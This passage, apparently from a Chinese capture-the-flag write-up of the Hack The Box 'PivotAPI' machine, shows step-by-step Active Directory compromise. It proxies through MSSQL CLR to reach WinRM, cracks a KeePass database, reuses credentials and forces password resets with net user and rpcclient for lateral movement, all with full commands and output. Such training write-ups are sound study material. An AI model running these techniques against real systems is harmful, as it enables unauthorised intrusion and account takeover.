                                         *WinRM                                

The command completed successfully.

发现这个用户除了在域用户组外还有在WinRM组,回顾之前的邮件也确实提到了这个服务,我们先看看该服务是否开启了:

SQL (sa  dbo@master)> xp_cmdshell netstat -ano | find "5985"
output                                                                     
------------------------------------------------------------------------   
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4   

  TCP    [::]:5985              [::]:0                 LISTENING       4 

开启了并且在监听中,只是没有对外暴露,邮件中还提到创建了一个规则来实现阻止对外暴露并封锁了TCP、UDP甚至ICMP的输出,因此通用的隧道转发等方式都行不通了。但是我们拿到了mssql的默认系统管理员用户,还可以尝试用mssqlproxy工具,链接:https://github.com/blackarrowsec/mssqlproxy

mssqlproxy 是一个工具包,旨在通过套接字重用,通过受损的 Microsoft SQL Server 在受限环境中执行横向移动。客户端需要 SQL Server 上的 impacket 和 sysadmin 权限。

mssqlproxy绕过封锁规则

但是当我们克隆这个仓库时,发现对应的mssqlclient.py只适用于python2,但是现在经常使用python3,对于这种情况,我们一般是先搜索看看有没有其他人的解决方案,如果没有找到再凭借自己对安全开发的理解与经验对工具进行修改。在搜索引擎中找到了:
2024-02-07-16-14-52
重新克隆这个新的仓库,尝试利用:

┌──(root㉿hunter)-[/home/…/Desktop/htb/PivotAPI/mssqlproxy]
└─# cp reciclador.dll ../
                                        
┌──(root㉿hunter)-[/home/…/Desktop/htb/PivotAPI/mssqlproxy]
└─# cd ..                
                                             
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ls
 20240128095527_bloodhound.zip     oracle_credential           restart-service-strings   users_list
 api-monitor-v2r13-setup-x64.exe   pdf_authors                'Server MSSQL.eml'        'WinRM Service.eml'
 ftp                               pivotapi.pdf               'Server MSSQL.msg'        'WinRM Service.msg'
 Kaorz_hash                        reciclador.dll              set_export.sh
 mssqlproxy                        Restart-OracleService.exe   strings_Restart-Oracle
 nmapscan                          restart-service.exe         systeminfo

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# python3 mssqlproxy/mssqlclient.py 'LicorDebellota.htb/sa:#mssql_s3rV1c3!2020@10.129.207.210'
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

mssqlproxy - Copyright 2020 BlackArrow
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: Español
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió el contexto de la base de datos a 'master'.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió la configuración de idioma a Español.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL> enable_ole
SQL> upload reciclador.dll c:\windows\temp\reciclador.dll
[+] Uploading 'reciclador.dll' to 'c:\windows\temp\reciclador.dll'...
[+] Size is 109056 bytes
[+] Upload completed
SQL> Traceback (most recent call last):
  File "/home/cvestone/Desktop/htb/PivotAPI/mssqlproxy/mssqlclient.py", line 547, in <module>
    shell.cmdloop()
  File "/usr/lib/python3.11/cmd.py", line 126, in cmdloop
    line = input(self.prompt)
           ^^^^^^^^^^^^^^^^^^
KeyboardInterrupt
┌──(root㉿hunter)-[/home/…/Desktop/htb/PivotAPI/mssqlproxy]
└─# ls
assembly.cs  Microsoft.SqlServer.Proxy.dll  mssqlclient.py  README.md  reciclador  reciclador.dll

但是似乎这个仓库里只有assembly.cs源码,而没有编译好的文件,我们既可以尝试搜索是否有已经编译好的dll文件,也可以自己编译
发现官方就已经有发布了:
2024-02-07-16-31-14

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# wget -m https://github.com/blackarrowsec/mssqlproxy/releases/download/0.1/assembly.dll
--2024-02-07 16:31:57--  https://github.com/blackarrowsec/mssqlproxy/releases/download/0.1/assembly.dll
正在解析主机 github.com (github.com)... 20.205.243.166
正在连接 github.com (github.com)|20.205.243.166|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 302 Found
位置:https://objects.githubusercontent.com/github-production-release-asset-2e65be/239964495/ec7f2480-4e5a-11ea-84f8-efa3df9d6c73?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240207%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240207T083158Z&X-Amz-Expires=300&X-Amz-Signature=65ab9367d1aeb7eb965069fa9ad2e4c5f4c85e86c55607081311933c351a2a42&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=239964495&response-content-disposition=attachment%3B%20filename%3Dassembly.dll&response-content-type=application%2Foctet-stream [跟随至新的 URL]
--2024-02-07 16:31:58--  https://objects.githubusercontent.com/github-production-release-asset-2e65be/239964495/ec7f2480-4e5a-11ea-84f8-efa3df9d6c73?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240207%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240207T083158Z&X-Amz-Expires=300&X-Amz-Signature=65ab9367d1aeb7eb965069fa9ad2e4c5f4c85e86c55607081311933c351a2a42&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=239964495&response-content-disposition=attachment%3B%20filename%3Dassembly.dll&response-content-type=application%2Foctet-stream
正在解析主机 objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...
正在连接 objects.githubusercontent.com (objects.githubusercontent.com)|185.199.108.133|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:4608 (4.5K) [application/octet-stream]
正在保存至: “github.com/blackarrowsec/mssqlproxy/releases/download/0.1/assembly.dll”

github.com/blackarrowsec/ms 100%[==========================================>]   4.50K  --.-KB/s  用时 0s      

2024-02-07 16:31:59 (54.4 MB/s) - 已保存 “github.com/blackarrowsec/mssqlproxy/releases/download/0.1/assembly.dll” [4608/4608])

下载完毕 --2024-02-07 16:31:59--
总用时:2.4s
下载了:1 个文件,0s (54.4 MB/s) 中的 4.5K
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# cp github.com/blackarrowsec/mssqlproxy/releases/download/0.1/assembly.dll ./          
                                                                                                               
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# python3 mssqlproxy/mssqlclient.py 'LicorDebellota.htb/sa:#mssql_s3rV1c3!2020@10.129.207.210' -install -clr assembly.dll                                                                                                  
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

mssqlproxy - Copyright 2020 BlackArrow
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: Español
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió el contexto de la base de datos a 'master'.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió la configuración de idioma a Español.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[*] Proxy mode: install
[*] CLR enabled
[*] Assembly successfully installed
[*] Procedure successfully installed

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# python3 mssqlproxy/mssqlclient.py 'LicorDebellota.htb/sa:#mssql_s3rV1c3!2020@10.129.207.210' -start -reciclador 'c:\windows\temp\reciclador.dll'
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

mssqlproxy - Copyright 2020 BlackArrow
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: Español
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió el contexto de la base de datos a 'master'.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió la configuración de idioma a Español.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[*] Proxy mode: check
[*] Assembly is installed
[*] Procedure is installed
[*] reciclador is installed
[*] clr enabled
[*] Proxy mode: start
[*] Listening on port 1337...
[*] ACK from server!

发现已经打开了1337端口进行监听,为了保证严谨也可以用netstat再验证一下:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# netstat -tnlp | grep 1337
tcp        0      0 0.0.0.0:1337            0.0.0.0:*               LISTEN      155907/python3      
连接winrm获取shell

接下来就可以用proxychains代理:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# nt /etc/proxychains4.conf 
# 在最后添加 socks5 	127.0.0.1 1337
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# proxychains evil-winrm -i 127.0.0.1 -u svc_mssql -p '#mssql_s3rV1c3!2020'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
[proxychains] Dynamic chain  ...  127.0.0.1:1337  ...  127.0.0.1:5985  ...  OK
*Evil-WinRM* PS C:\Users\svc_mssql\Documents> whoami
licordebellota\svc_mssql

但是可能是代理连接状态或者其他原因,拿到的这个shell并不是很稳定,常常会中断,然后等一分钟左右才能重新执行命令成功,但这就是渗透过程的常态,如果我们知道原因知道如何解决,会节省很多时间,但不知道的情况下只能一次又一次地重复这个过程,并且现在这种情况下是无法进行排查的,只能乖乖等待

*Evil-WinRM* PS C:\Users\svc_mssql\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\svc_mssql\desktop> ls


    Directorio: C:\Users\svc_mssql\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         8/8/2020  10:12 PM           2286 credentials.kdbx
-a----        4/30/2021  10:39 AM             93 note.txt
*Evil-WinRM* PS C:\Users\svc_mssql\desktop> download credentials.kdbx
                                        
Info: Downloading C:\Users\svc_mssql\desktop\credentials.kdbx to credentials.kdbx
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc_mssql\desktop> download note.txt 
                                        
Info: Downloading C:\Users\svc_mssql\desktop\note.txt to note.txt
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc_mssql\desktop> 

查看一下刚刚下载的文件:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# cat ./note.txt                                                              
Long running MSSQL Proxies can cause issues.  Please switch to SSH after getting credentials.  

这里提示我们长时间运行mssql代理会导致问题,这正好就是我们刚才遇到的情况,当然,这很有靶机的色彩,如果是现实中不会有这么明显的提示,但我们如果人忍受不了每次执行命令都要等待,肯定会自然想用其他方式拿到一个更稳定的shell。这种问题有时候也通常可能是管理员配置了什么设置项导致的。而

.kdbx文件是KeePass Password Safe数据库文件的扩展名。要打开 .kdbx 文件,需要使用 KeePass 软件或兼容的密码管理器,这是图形化的,也可以用命令行工具kpcli,可以用linux自带包管理器安装

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# kpcli --kdb credentials.kdbx 
Provide the master password: 
# 这里还需要破解出密码,因此先生成中间hash值:               
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# keepass2john credentials.kdbx   
credentials:$keepass$*2*60000*0*006e4f7f747a915a0301bded09da8339260ff96caf1ca7cef63b8fdd37c6a836*deabca672663938eddc0ee9e2726d9ff65d4ab7c6863f6f712f1c14b97c670a2*b33392502f94cd323ed25bc2d9c1749a*67ac769a9693b2ef7f1a149fb4e182042fcd2888df727ef4226edb5d9ae35c5c*dccf52b56e846bf088caa284beeaceffe16f304586ee13e87197387bac16ca6b
                              
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# keepass2john credentials.kdbx > credentials.kdbx.hash

# 利用hashcat破解
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# hashcat --help | grep -i keepass
  13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES)                | Password Manager
  29700 | KeePass 1 (AES/Twofish) and KeePass 2 (AES) - keyfile only mode | Password Manager
                    
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# hashcat -m 13400 credentials.kdbx.hash /usr/share/wordlists/rockyou.txt --user
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-haswell-13th Gen Intel(R) Core(TM) i5-13500HX, 30953/61970 MB (8192 MB allocatable), 20MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 5 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$keepass$*2*60000*0*006e4f7f747a915a0301bded09da8339260ff96caf1ca7cef63b8fdd37c6a836*deabca672663938eddc0ee9e2726d9ff65d4ab7c6863f6f712f1c14b97c670a2*b33392502f94cd323ed25bc2d9c1749a*67ac769a9693b2ef7f1a149fb4e182042fcd2888df727ef4226edb5d9ae35c5c*dccf52b56e846bf088caa284beeaceffe16f304586ee13e87197387bac16ca6b:mahalkita
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13400 (KeePass 1 (AES/Twofish) and KeePass 2 (AES))
Hash.Target......: $keepass$*2*60000*0*006e4f7f747a915a0301bded09da833...16ca6b
Time.Started.....: Wed Feb  7 18:13:36 2024 (0 secs)
Time.Estimated...: Wed Feb  7 18:13:36 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      885 H/s (3.41ms) @ Accel:16 Loops:1024 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 320/14344385 (0.00%)
Rejected.........: 0/320 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:59392-60000
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> 101010
Hardware.Mon.#1..: Temp: 68c Util:  7%

Started: Wed Feb  7 18:13:19 2024
Stopped: Wed Feb  7 18:13:37 2024

很快破解出密码mahalkita,重新连接并尝试执行命令:

kpcli:/> ls
=== Groups ===
Database/
kpcli:/> cd Database/
kpcli:/Database> ls
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Recycle Bin/
Windows/
kpcli:/Database> ls eMail/
kpcli:/Database> ls General/
kpcli:/Database> ls Homebanking/
kpcli:/Database> ls Internet/
kpcli:/Database> ls Network/
kpcli:/Database> ls Recycle\ Bin/
=== Entries ===
0. Sample Entry                                               keepass.info
1. Sample Entry #2                          keepass.info/help/kb/testform.
kpcli:/Database> ls Windows/
=== Entries ===
0. SSH                                                                    
kpcli:/Database> show -f Recycle\ Bin/Sample\ Entry

 Path: /Database/Recycle Bin/
Title: Sample Entry
Uname: User Name
 Pass: Password
  URL: https://keepass.info/
Notes: Notes

kpcli:/Database> show -f Recycle\ Bin/Sample\ Entry\ #2 

 Path: /Database/Recycle Bin/
Use of uninitialized value $comment in split at /usr/bin/kpcli line 6338.
Use of uninitialized value $val in pattern match (m//) at /usr/bin/kpcli line 3275.
Use of uninitialized value $val in sprintf at /usr/bin/kpcli line 3279.
Title: Sample Entry #2
Uname: Michael321
 Pass: 12345
  URL: https://keepass.info/help/kb/testform.html
Notes: 

kpcli:/Database> show -f Windows/SSH

 Path: /Database/Windows/
Title: SSH
Uname: 3v4Si0N
 Pass: Gu4nCh3C4NaRi0N!23
  URL: 
Notes: 

显然,联系刚才获取到的信息,最后一个是最有价值的

获取立足点

连接刚获取到的ssh凭据:

──(root㉿hunter)-[/home/…/Desktop/htb/PivotAPI/mssqlproxy]                                                     
└─# ssh 3v4Si0N@10.129.207.210                                                                                 
The authenticity of host '10.129.207.210 (10.129.207.210)' can't be established.                                                                                            
ED25519 key fingerprint is SHA256:D84pRKEdwy8GejDfHWYVRaAr8wMUPhSz0V4EUOCZC3Y.                       
This host key is known by the following other names/addresses:                                                      
    ~/.ssh/known_hosts:14: [hashed name]                                                                  
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
。。。
licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N>cd Desktop

licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N\Desktop>dir
 El volumen de la unidad C no tiene etiqueta.
 El número de serie del volumen es: 94DB-AFCA

 Directorio de C:\Users\3v4Si0N\Desktop

09/08/2020  16:01    <DIR>          .
09/08/2020  16:01    <DIR>          ..
06/02/2024  08:41                34 user.txt
               1 archivos             34 bytes
               2 dirs   4.234.256.384 bytes libres

licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N\Desktop>type user.txt
ecd5457068cd545b4f64647d1d017ed3

所以User Flag是:ecd5457068cd545b4f64647d1d017ed3

横向迁移
licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N\Desktop>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\3v4Si0N\Desktop> cd c:\
PS C:\> ls


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       08/08/2020     19:23                Developers
d-----       08/08/2020     12:53                inetpub
d-----       08/08/2020     22:48                PerfLogs
d-r---       19/02/2021     13:42                Program Files
d-----       09/08/2020     17:06                Program Files (x86)
d-r---       08/08/2020     19:46                Users
d-----       29/04/2021     17:31                Windows
PS C:\> cd .\Developers\
PS C:\Developers> ls
ls : Access to the path 'C:\Developers' is denied.
At line:1 char:1
+ ls
+ ~~
    + CategoryInfo          : PermissionDenied: (C:\Developers:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
# The "Developers" here looks like a user group name
PS C:\Developers> net group /domain

Group Accounts for \\PIVOTAPI

-------------------------------------------------------------------------------
*Administrators key
*Administrators key of the organization
*Business Administrators
*Schema Admins
*Domain Admins
*Domain Controllers
*Cloneable Domain Controllers
*Read-only Domain Controllers
*Developers
*DnsUpdateProxy
*Enterprise Domain Controllers Read-Only
*Domain Computers
*Domain Guests
*LAPS ADM
*LAPS READ
*Group Policy Creator Owners
*Protected Users
*Domain Users
*WinRM
The command completed successfully.

可以发现Developers确实就是域用户组中的其中一个,看看该组中有哪些用户:

PS C:\Developers> net group Developers /domain
Group Name     Developers
Comment

Members

-------------------------------------------------------------------------------
jari                     superfume
The command completed successfully.

又是陌生的名字,可以再去bloodhound里看看能不能找到什么新的利用路径,先看看developers组相关的攻击路径:
2024-02-08-13-14-13
这里列出了用户之间的权限关系以及superfume用户与developers组的从属关系,因此我们要访问Developers文件夹的内容之前,必须根据这些关系先拿到最终的superfume用户权限。比如3V4SI0N具有DR.ZAIUSS用户的所有权,因此可以尝试修改DR.ZAIUSS用户的密码,这样就等于拿到了DR.ZAIUSS的shell,也就是横向迁移:

licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N>net user dr.zaiuss cvestone!666
The command completed successfully.

不过并不能访问到DR.ZAIUSS的ssh:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ssh dr.zaiuss@10.129.228.115             
dr.zaiuss@10.129.228.115's password: 
Permission denied, please try again.
dr.zaiuss@10.129.228.115's password: 

但是除了ssh,我们还有evil-winrm可以利用,在另一个窗口执行:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# proxychains evil-winrm -i 127.0.0.1 -u dr.zaiuss -p 'cvestone!666'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
[proxychains] Dynamic chain  ...  127.0.0.1:1337  ...  127.0.0.1:5985  ...  OK
*Evil-WinRM* PS C:\Users\Dr.Zaiuss\Documents> net user superfume cvestone!666
Se ha completado el comando correctamente.

*Evil-WinRM* PS C:\Users\Dr.Zaiuss\Documents> 

同样的,修改了superfume用户的密码,从而拿到权限,如果失败了,保持耐心多尝试几次,并且一定要快速,因为note.txt已告诉我们存在代理网络连接不稳定问题。尝试后,superfume用户同样不能用ssh连接,依旧使用evil-winrm

*Evil-WinRM* PS C:\> cd Developers
*Evil-WinRM* PS C:\Developers> dir


    Directorio: C:\Developers


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         8/8/2020   7:26 PM                Jari
d-----         8/8/2020   7:23 PM                Superfume


*Evil-WinRM* PS C:\Developers> cd Jari
*Evil-WinRM* PS C:\Developers\Jari> dir


    Directorio: C:\Developers\Jari


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         8/8/2020   7:26 PM           3676 program.cs
-a----         8/8/2020   7:18 PM           7168 restart-mssql.exe


*Evil-WinRM* PS C:\Developers\Jari> download program.cs
                                        
Info: Downloading C:\Developers\Jari\program.cs to program.cs
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Developers\Jari> download restart-mssql.exe
                                        
Info: Downloading C:\Developers\Jari\restart-mssql.exe to restart-mssql.exe
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Developers\Jari> cd ..
*Evil-WinRM* PS C:\Developers> cd Superfume
*Evil-WinRM* PS C:\Developers\Superfume> dir
*Evil-WinRM* PS C:\Developers\Superfume> 

下载了两个文件

分析程序2

查看.cs源码,推测应该就是另外一个程序的源码
查看一下该可执行程序的具体类型:

┌──(root㉿hunter)-[/home/…/Desktop/htb/PivotAPI/Developers]
└─# file restart-mssql.exe        
restart-mssql.exe: PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows, 2 sections

该程序是基于.net的,并且名字与最初的程序是相似的,猜测这个程序也能像第一个程序一样泄漏出凭据,但首先要通过逆向分析的手段,搜索一下关于.net的逆向工具:
2024-02-08-18-00-00
最终我决定选择在虚拟机使用dnSpy工具:
2024-02-09-17-23-23

代码审计发现泄漏凭据

结合审计反编译代码和源代码,
反编译:

// restart_oracle.Program
// Token: 0x06000001 RID: 1 RVA: 0x00002048 File Offset: 0x00000248
private static void Main()
{
	string value = "\r\n    ____            __             __                               __\r\n   / __ \\___  _____/ /_____ ______/ /_   ____ ___  ______________ _/ /\r\n  / /_/ / _ \\/ ___/ __/ __ `/ ___/ __/  / __ `__ \\/ ___/ ___/ __ `/ / \r\n / _, _/  __(__  ) /_/ /_/ / /  / /_   / / / / / (__  |__  ) /_/ / /  \r\n/_/ |_|\\___/____/\\__/\\__,_/_/   \\__/  /_/ /_/ /_/____/____/\\__, /_/   \r\n                                                             /_/      \r\n                                                 by @HelpDesk 2020\r\n\r\n";
	byte[] bytes = Encoding.ASCII.GetBytes("CR_is_a_crybaby");
	byte[] data = new byte[]
	{
		66,
		180,
		137,
		236,
		54,
		46,
		36,
		97,
		214,
		48,
		90,
		72,
		24,
		83
	};
	byte[] array = Program.RC4.Decrypt(bytes, data);
	Console.WriteLine(value);
	Thread.Sleep(5000);
	Process process = new Process();
	SecureString secureString = new SecureString();
	process.StartInfo.FileName = "c:\\windows\\syswow64\\cmd.exe";
	process.StartInfo.Arguments = "/c sc.exe stop SERVICENAME ; sc.exe start SERVICENAME";
	process.StartInfo.RedirectStandardOutput = true;
	process.StartInfo.UseShellExecute = false;
	process.StartInfo.UserName = "Jari";
	string text = "";
	for (int i = 0; i < text.Length; i++)
	{
		secureString.AppendChar(text[i]);
	}
	process.StartInfo.Password = secureString;
	process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
}

源代码:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Threading;

namespace restart_oracle
{
    class Program
    {
        public class RC4
        {

            public static byte[] Encrypt(byte[] pwd, byte[] data)
            {
                int a, i, j, k, tmp;
                int[] key, box;
                byte[] cipher;

                key = new int[256];
                box = new int[256];
                cipher = new byte[data.Length];

                for (i = 0; i < 256; i++)
                {
                    key[i] = pwd[i % pwd.Length];
                    box[i] = i;
                }
                for (j = i = 0; i < 256; i++)
                {
                    j = (j + box[i] + key[i]) % 256;
                    tmp = box[i];
                    box[i] = box[j];
                    box[j] = tmp;
                }
                for (a = j = i = 0; i < data.Length; i++)
                {
                    a++;
                    a %= 256;
                    j += box[a];
                    j %= 256;
                    tmp = box[a];
                    box[a] = box[j];
                    box[j] = tmp;
                    k = box[((box[a] + box[j]) % 256)];
                    cipher[i] = (byte)(data[i] ^ k);
                }
                return cipher;
            }

            public static byte[] Decrypt(byte[] pwd, byte[] data)
            {
                return Encrypt(pwd, data);
            }

            public static byte[] StringToByteArray(String hex)
            {
                int NumberChars = hex.Length;
                byte[] bytes = new byte[NumberChars / 2];
                for (int i = 0; i < NumberChars; i += 2)
                    bytes[i / 2] = Convert.ToByte(hex.Substring(i, 2), 16);
                return bytes;
            }

        }

        static void Main()
        {
        
            string banner = @"
    ____            __             __                               __
   / __ \___  _____/ /_____ ______/ /_   ____ ___  ______________ _/ /
  / /_/ / _ \/ ___/ __/ __ `/ ___/ __/  / __ `__ \/ ___/ ___/ __ `/ / 
 / _, _/  __(__  ) /_/ /_/ / /  / /_   / / / / / (__  |__  ) /_/ / /  
/_/ |_|\___/____/\__/\__,_/_/   \__/  /_/ /_/ /_/____/____/\__, /_/   
                                                             /_/      
                                                 by @HelpDesk 2020

";
            byte[] key = Encoding.ASCII.GetBytes("");
            byte[] password_cipher = { };
            byte[] resultado = RC4.Decrypt(key, password_cipher);
            Console.WriteLine(banner);
            Thread.Sleep(5000);
            System.Diagnostics.Process psi = new System.Diagnostics.Process();
            System.Security.SecureString ssPwd = new System.Security.SecureString();
            psi.StartInfo.FileName = "c:\\windows\\syswow64\\cmd.exe";
            psi.StartInfo.Arguments = "/c sc.exe stop SERVICENAME ; sc.exe start SERVICENAME";
            psi.StartInfo.RedirectStandardOutput = true;
            psi.StartInfo.UseShellExecute = false;
            psi.StartInfo.UserName = "Jari";
            string password = "";
            for (int x = 0; x < password.Length; x++)
            {
               ssPwd.AppendChar(password[x]);
            }
            password = "";
            psi.StartInfo.Password = ssPwd;
            psi.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            psi.Start();

        }
    }
}

代码审计分析:

通常来说,凭据有可能泄漏在控制台输出语句中,因此可以在Console.WriteLine(value);设置断点,然后观察此时内存中储存的数据,我们确实发现了泄漏的凭据密码,并且由源码psi.StartInfo.UserName = "Jari";与这是在Jari目录下的文件,我们可以知道这个密码对应的就是Jari的:
2024-02-09-17-27-41
2024-02-09-17-28-49
因此,将新的凭据Jari:Cos@Chung@!RPG记录到文件中
该凭据依然还是ssh连接失败,依然尝试通过evil-winrm连接,成功了,但是这次我们还可以尝试有没有其他开放的API可以利用,因为利用winrm代理连接太不稳定了,重新查看tcpdetails.nmap发现还有msrpc服务可以尝试连接:

这个靶机处在域环境中,当我们拿到一个shell,然后通过横向迁移拿到其他shell,我们可以反复横跳,这就是pivot,又由于不仅仅只有开放一个API让我们尝试连接, 我认为这就是PivotAPI这个挑战名的由来。

pivot by msrpc

在这之前先看看用户Jari的用户属性:
2024-02-09-21-57-57
外部连接控制对象中发现该用户可以强制修改其他两个用户的密码,
开始在新的窗口中尝试连接msrpc,它的用法有很多,我们可以尝试用它改密码:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# rpcclient -U 'Jari%Cos@Chung@!RPG' 10.129.228.115
rpcclient $> setuserinfo2 help                                                            
Usage: setuserinfo2 username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> setuserinfo2 gibdeon 23 'cvestone!666'
rpcclient $> 

同时可以用crackmapexec验证是否修改成功:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# crackmapexec smb 10.129.228.115 -u gibdeon -p 'cvestone!666'
SMB         10.129.228.115  445    PIVOTAPI         [*] Windows 10.0 Build 17763 x64 (name:PIVOTAPI) (domain:LicorDeBellota.htb) (signing:True) (SMBv1:False)
SMB         10.129.228.115  445    PIVOTAPI         [+] LicorDeBellota.htb\gibdeon:cvestone!666 

有个+说明成功了。

bloodhound帮助寻找域中更多攻击路径

再查看用户gibdeon的用户属性:
2024-02-09-22-21-56
一级群组成员关系中发现该用户在域用户组账户操作员组中。
查看域用户组的具体情况:
2024-02-09-22-25-51
没有能够直接控制的外部对象:
2024-02-09-22-27-49
账户操作员组却有很多能够直接控制的外部对象:
2024-02-09-22-29-36
